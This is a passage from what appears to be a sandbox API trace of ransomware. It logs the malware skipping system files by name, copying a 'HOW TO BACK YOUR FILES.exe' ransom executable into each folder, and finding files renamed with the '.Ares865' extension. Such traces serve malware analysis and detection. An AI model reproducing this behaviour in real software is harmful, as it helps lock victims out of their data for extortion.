nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0091.554] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0091.554] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7b70 [0091.554] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM" [0091.554] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0091.554] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b68 | out: hHeap=0x2b0000) returned 1 [0091.554] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM") returned 164 [0091.554] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM" [0091.554] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0091.554] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\adobe\\arm\\how to back your files.exe"), bFailIfExists=1) returned 0 [0091.555] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0091.555] GetLastError () returned 0x0 [0091.555] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0091.555] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0091.555] CloseHandle (hObject=0x120) returned 1 [0091.555] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0091.555] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0091.555] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4efbbe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4cf6efa0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4cf6efa0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0091.556] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.556] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0091.556] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0091.556] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4efbbe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4cf6efa0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4cf6efa0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0091.556] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.556] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0091.556] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0091.556] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0091.556] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4cf6efa0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4cf6efa0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0091.556] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0091.556] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe4efbbe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x67f06480, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x67f06480, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Reader_10.0.0", cAlternateFileName="READER~1.0")) returned 1 [0091.556] lstrcmpiW (lpString1="Reader_10.0.0", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0091.556] lstrcmpiW (lpString1="Reader_10.0.0", lpString2="aoldtz.exe") returned 1 [0091.556] lstrcmpiW (lpString1="Reader_10.0.0", lpString2=".") returned 1 [0091.556] lstrcmpiW (lpString1="Reader_10.0.0", lpString2="..") returned 1 [0091.556] lstrcmpiW (lpString1="Reader_10.0.0", lpString2="windows") returned -1 [0091.556] lstrcmpiW (lpString1="Reader_10.0.0", lpString2="bootmgr") returned 1 [0091.556] lstrcmpiW (lpString1="Reader_10.0.0", lpString2="temp") returned -1 [0091.556] lstrcmpiW (lpString1="Reader_10.0.0", lpString2="pagefile.sys") returned 1 [0091.556] lstrcmpiW (lpString1="Reader_10.0.0", lpString2="boot") returned 1 [0091.556] lstrcmpiW (lpString1="Reader_10.0.0", lpString2="ids.txt") returned 1 [0091.556] lstrcmpiW (lpString1="Reader_10.0.0", lpString2="ntuser.dat") returned 1 [0091.556] lstrcmpiW (lpString1="Reader_10.0.0", lpString2="perflogs") returned 1 [0091.556] lstrcmpiW (lpString1="Reader_10.0.0", lpString2="MSBuild") returned 1 [0091.556] lstrlenW (lpString="Reader_10.0.0") returned 13 [0091.556] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM\\*") returned 166 [0091.556] lstrcpyW (in: lpString1=0x2cce54a, lpString2="Reader_10.0.0" | out: lpString1="Reader_10.0.0") returned="Reader_10.0.0" [0091.556] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b68 [0091.556] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x166) returned 0x332fc8 [0091.556] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b70 | out: ListHead=0x2e7710, ListEntry=0x2e7b70) returned 0x2e7b50 [0091.556] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe4efbbe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x67f06480, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x67f06480, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Reader_10.0.0", cAlternateFileName="READER~1.0")) returned 0 [0091.556] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0091.557] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7b70 [0091.557] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM\\Reader_10.0.0", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM\\Reader_10.0.0") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM\\Reader_10.0.0" [0091.557] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0091.557] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b68 | out: hHeap=0x2b0000) returned 1 [0091.557] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM\\Reader_10.0.0") returned 178 [0091.557] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM\\Reader_10.0.0" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM\\Reader_10.0.0") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM\\Reader_10.0.0" [0091.557] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0091.557] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM\\Reader_10.0.0\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\adobe\\arm\\reader_10.0.0\\how to back your files.exe"), bFailIfExists=1) returned 0 [0091.557] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0091.557] GetLastError () returned 0x0 [0091.558] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0091.558] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0091.558] CloseHandle (hObject=0x120) returned 1 [0091.558] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0091.558] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0091.558] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM\\Reader_10.0.0\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe4efbbe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x67f06480, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x67f06480, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0091.558] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.558] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0091.558] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0091.558] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe4efbbe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x67f06480, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x67f06480, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0091.558] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.558] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0091.558] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0091.558] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0091.558] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e186d00, ftCreationTime.dwHighDateTime=0x1cfb543, ftLastAccessTime.dwLowDateTime=0x7e186d00, ftLastAccessTime.dwHighDateTime=0x1cfb543, ftLastWriteTime.dwLowDateTime=0x67ca4e80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x3db00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AdbeRdrSecUpd10111.msp.Ares865", cAlternateFileName="ADBERD~1.ARE")) returned 1 [0091.558] lstrcmpiW (lpString1="AdbeRdrSecUpd10111.msp.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.558] lstrcmpiW (lpString1="AdbeRdrSecUpd10111.msp.Ares865", lpString2="aoldtz.exe") returned -1 [0091.558] lstrcmpiW (lpString1="AdbeRdrSecUpd10111.msp.Ares865", lpString2=".") returned 1 [0091.558] lstrcmpiW (lpString1="AdbeRdrSecUpd10111.msp.Ares865", lpString2="..") returned 1 [0091.558] lstrcmpiW (lpString1="AdbeRdrSecUpd10111.msp.Ares865", lpString2="windows") returned -1 [0091.558] lstrcmpiW (lpString1="AdbeRdrSecUpd10111.msp.Ares865", lpString2="bootmgr") returned -1 [0091.558] lstrcmpiW (lpString1="AdbeRdrSecUpd10111.msp.Ares865", lpString2="temp") returned -1 [0091.558] lstrcmpiW (lpString1="AdbeRdrSecUpd10111.msp.Ares865", lpString2="pagefile.sys") returned -1 [0091.558] lstrcmpiW (lpString1="AdbeRdrSecUpd10111.msp.Ares865", lpString2="boot") returned -1 [0091.558] lstrcmpiW (lpString1="AdbeRdrSecUpd10111.msp.Ares865", lpString2="ids.txt") returned -1 [0091.558] lstrcmpiW (lpString1="AdbeRdrSecUpd10111.msp.Ares865", lpString2="ntuser.dat") returned -1 [0091.558] lstrcmpiW (lpString1="AdbeRdrSecUpd10111.msp.Ares865", lpString2="perflogs") returned -1 [0091.559] lstrcmpiW (lpString1="AdbeRdrSecUpd10111.msp.Ares865", lpString2="MSBuild") returned -1 [0091.559] lstrlenW (lpString="AdbeRdrSecUpd10111.msp.Ares865") returned 30 [0091.559] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM\\Reader_10.0.0\\*") returned 180 [0091.559] lstrcpyW (in: lpString1=0x2cce566, lpString2="AdbeRdrSecUpd10111.msp.Ares865" | out: lpString1="AdbeRdrSecUpd10111.msp.Ares865") returned="AdbeRdrSecUpd10111.msp.Ares865" [0091.559] lstrlenW (lpString="AdbeRdrSecUpd10111.msp.Ares865") returned 30 [0091.559] lstrlenW (lpString="Ares865") returned 7 [0091.559] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0091.559] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb4450880, ftCreationTime.dwHighDateTime=0x1cf6c45, ftLastAccessTime.dwLowDateTime=0xb4450880, ftLastAccessTime.dwHighDateTime=0x1cf6c45, ftLastWriteTime.dwLowDateTime=0x67cf1140, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x10e3300, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AdbeRdrUpd10110_MUI.msp.Ares865", cAlternateFileName="ADBERD~2.ARE")) returned 1 [0091.559] lstrcmpiW (lpString1="AdbeRdrUpd10110_MUI.msp.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.559] lstrcmpiW (lpString1="AdbeRdrUpd10110_MUI.msp.Ares865", lpString2="aoldtz.exe") returned -1 [0091.559] lstrcmpiW (lpString1="AdbeRdrUpd10110_MUI.msp.Ares865", lpString2=".") returned 1 [0091.559] lstrcmpiW (lpString1="AdbeRdrUpd10110_MUI.msp.Ares865", lpString2="..") returned 1 [0091.559] lstrcmpiW (lpString1="AdbeRdrUpd10110_MUI.msp.Ares865", lpString2="windows") returned -1 [0091.559] lstrcmpiW (lpString1="AdbeRdrUpd10110_MUI.msp.Ares865", lpString2="bootmgr") returned -1 [0091.559] lstrcmpiW (lpString1="AdbeRdrUpd10110_MUI.msp.Ares865", lpString2="temp") returned -1 [0091.559] lstrcmpiW (lpString1="AdbeRdrUpd10110_MUI.msp.Ares865", lpString2="pagefile.sys") returned -1 [0091.559] lstrcmpiW (lpString1="AdbeRdrUpd10110_MUI.msp.Ares865", lpString2="boot") returned -1 [0091.559] lstrcmpiW (lpString1="AdbeRdrUpd10110_MUI.msp.Ares865", lpString2="ids.txt") returned -1 [0091.559] lstrcmpiW (lpString1="AdbeRdrUpd10110_MUI.msp.Ares865", lpString2="ntuser.dat") returned -1 [0091.559] lstrcmpiW (lpString1="AdbeRdrUpd10110_MUI.msp.Ares865", lpString2="perflogs") returned -1 [0091.559] lstrcmpiW (lpString1="AdbeRdrUpd10110_MUI.msp.Ares865", lpString2="MSBuild") returned -1 [0091.559] lstrlenW (lpString="AdbeRdrUpd10110_MUI.msp.Ares865") returned 31 [0091.559] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrSecUpd10111.msp.Ares865") returned 209 [0091.559] lstrcpyW (in: lpString1=0x2cce566, lpString2="AdbeRdrUpd10110_MUI.msp.Ares865" | out: lpString1="AdbeRdrUpd10110_MUI.msp.Ares865") returned="AdbeRdrUpd10110_MUI.msp.Ares865" [0091.559] lstrlenW (lpString="AdbeRdrUpd10110_MUI.msp.Ares865") returned 31 [0091.559] lstrlenW (lpString="Ares865") returned 7 [0091.559] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0091.559] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2540cc00, ftCreationTime.dwHighDateTime=0x1d1056e, ftLastAccessTime.dwLowDateTime=0x2540cc00, ftLastAccessTime.dwHighDateTime=0x1d1056e, ftLastWriteTime.dwLowDateTime=0x67f2c5e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x109d300, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AdbeRdrUpd10116_MUI.msp.Ares865", cAlternateFileName="ADBERD~3.ARE")) returned 1 [0091.559] lstrcmpiW (lpString1="AdbeRdrUpd10116_MUI.msp.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.559] lstrcmpiW (lpString1="AdbeRdrUpd10116_MUI.msp.Ares865", lpString2="aoldtz.exe") returned -1 [0091.559] lstrcmpiW (lpString1="AdbeRdrUpd10116_MUI.msp.Ares865", lpString2=".") returned 1 [0091.559] lstrcmpiW (lpString1="AdbeRdrUpd10116_MUI.msp.Ares865", lpString2="..") returned 1 [0091.559] lstrcmpiW (lpString1="AdbeRdrUpd10116_MUI.msp.Ares865", lpString2="windows") returned -1 [0091.559] lstrcmpiW (lpString1="AdbeRdrUpd10116_MUI.msp.Ares865", lpString2="bootmgr") returned -1 [0091.559] lstrcmpiW (lpString1="AdbeRdrUpd10116_MUI.msp.Ares865", lpString2="temp") returned -1 [0091.559] lstrcmpiW (lpString1="AdbeRdrUpd10116_MUI.msp.Ares865", lpString2="pagefile.sys") returned -1 [0091.560] lstrcmpiW (lpString1="AdbeRdrUpd10116_MUI.msp.Ares865", lpString2="boot") returned -1 [0091.560] lstrcmpiW (lpString1="AdbeRdrUpd10116_MUI.msp.Ares865", lpString2="ids.txt") returned -1 [0091.560] lstrcmpiW (lpString1="AdbeRdrUpd10116_MUI.msp.Ares865", lpString2="ntuser.dat") returned -1 [0091.560] lstrcmpiW (lpString1="AdbeRdrUpd10116_MUI.msp.Ares865", lpString2="perflogs") returned -1 [0091.560] lstrcmpiW (lpString1="AdbeRdrUpd10116_MUI.msp.Ares865", lpString2="MSBuild") returned -1 [0091.560] lstrlenW (lpString="AdbeRdrUpd10116_MUI.msp.Ares865") returned 31 [0091.560] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10110_MUI.msp.Ares865") returned 210 [0091.560] lstrcpyW (in: lpString1=0x2cce566, lpString2="AdbeRdrUpd10116_MUI.msp.Ares865" | out: lpString1="AdbeRdrUpd10116_MUI.msp.Ares865") returned="AdbeRdrUpd10116_MUI.msp.Ares865" [0091.560] lstrlenW (lpString="AdbeRdrUpd10116_MUI.msp.Ares865") returned 31 [0091.560] lstrlenW (lpString="Ares865") returned 7 [0091.560] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0091.560] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4cfe13c0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4cfe13c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0091.560] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0091.560] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4cfe13c0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4cfe13c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0091.560] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0091.560] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7b50 [0091.560] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat" [0091.560] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31efc8 | out: hHeap=0x2b0000) returned 1 [0091.560] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b48 | out: hHeap=0x2b0000) returned 1 [0091.560] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat") returned 168 [0091.560] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat" [0091.560] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0091.560] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\adobe\\acrobat\\how to back your files.exe"), bFailIfExists=1) returned 0 [0091.561] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0091.561] GetLastError () returned 0x0 [0091.561] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0091.561] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0091.561] CloseHandle (hObject=0x120) returned 1 [0091.561] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0091.561] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0091.561] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application 